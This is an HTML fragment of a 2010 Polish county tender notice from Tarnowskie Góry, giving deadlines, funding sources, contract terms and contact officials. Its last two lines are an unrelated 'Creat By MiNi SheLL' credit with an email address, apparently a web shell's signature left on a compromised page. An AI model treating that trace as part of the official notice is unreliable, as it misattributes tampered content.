<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.tarnogorski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Organizacyjny Starostwa Powiatowego w Tarnowskich Górach,ul.Karłuszowiec 5 (pokój 101) lub za pośrednictwem poczty po otrzymaniu pisemnego wniosku o jej przekazanie.SIWZ jest bezpłatna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 09:30, miejsce: Zamkniętą kopertę zawierającą ofertę należy złożyć w siedzibie Starostwa Powiatowego, 42-600 Tarnowskie Góry, ul. Karłuszowiec 5 (Kancelaria Starostwa, pok. 1).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Kategoria usług: 12
2. Projekt jest finansowany przez:
NARODOWY FUNDUSZ OCHRONY ŚRODOWISKA i GOSPODARKI WODNEJ
02-673 WARSZAWA, POLSKA, ul. Konstruktorska 3a oraz
WOJEWÓDZKI FUNDUSZ OCHRONY ŚRODOWISKA I GOSPODARKI WODNEJ
W KATOWICACH, 40-035 KATOWICE, ul. Plebiscytowa 19
3. Termin realizacji zamówienia: 
Przewidywana data rozpoczęcia realizacji Umowy to I kwartał 2010 r., a okres wykonywania Umowy (łącznie z obsługą podczas Okresu Zgłaszania Wad - do zatwierdzenia raportu końcowego z realizacji Umowy) to maksymalnie 22 miesiące od terminu podpisania Kontraktu na Roboty, w tym:
-Wykonanie Kontraktu (potwierdzone wydaniem Świadectwa Wykonania) - po upływie Okresu Zgłaszania Wad dla Kontraktu - tj. 6 miesięcy od daty wydania Świadectwa Przejęcia dla Kontraktu.
-Po upływie Okresu Zgłaszania Wad dla Kontraktu, Inżynier złoży stosowny raport w terminie określonym w rozdziale VII części  III SIWZ. Zatwierdzenie przez Zamawiającego Raportu Końcowego z realizacji  Umowy -  nie później niż 22 miesiące od terminu podpisania Kontraktu na Roboty.
4. Osobami uprawnionymi do kontaktów z wykonawcami są:
w kwestiach formalnych: Iwona Penkaty - Główny Specjalista ds. Zamówień Publicznych; fax : +48 32 381 37 27
w kwestiach merytorycznych:
- Hanna Mrowicka - Naczelnik Wydziału Gospodarki Nieruchomościami; fax : +48 32 382 27 21
- Marcin Stankowski - podinspektor Wydziału Gospodarki Nieruchomościami; fax : +48 32 382 27 21
5. Otwarcie ofert nastąpi w siedzibie Starostwa Powiatowego w Tarnowskich Górach, ul. Karłuszowiec 5 w dniu 4 lutego 2010 roku o godzinie 10:00.
6. Zamawiający nie ustanawia dynamicznego systemu zakupów.
7. Zamawiający nie przewiduje zawarcia umowy ramowej. 
8. Zamawiający ustala zabezpieczenie należytego wykonania umowy zawartej w wyniku postępowania o udzielenie niniejszego zamówienia w wysokości 8 % ceny całkowitej (powiększonej o VAT) podanej w formularzu ofertowym.
Wybrany Wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonania przed podpisaniem umowy zgodnie ze Specyfikacją Istotnych Warunków Zamówienia i Umową.
9. Rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich. 
10. Zamawiający nie przewiduje zwrotu kosztów postępowania za wyjątkiem regulacji zawartych w art. 93, ust. 4 ustawy Prawo zamówień publicznych.
11. Postępowanie prowadzone jest w formie pisemnej. Dokumenty przekazywane za pomocą telefaksu lub drogą elektroniczną należy niezwłocznie potwierdzić pisemnie.

Creat By MiNi SheLL
Email: jattceo@gmail.com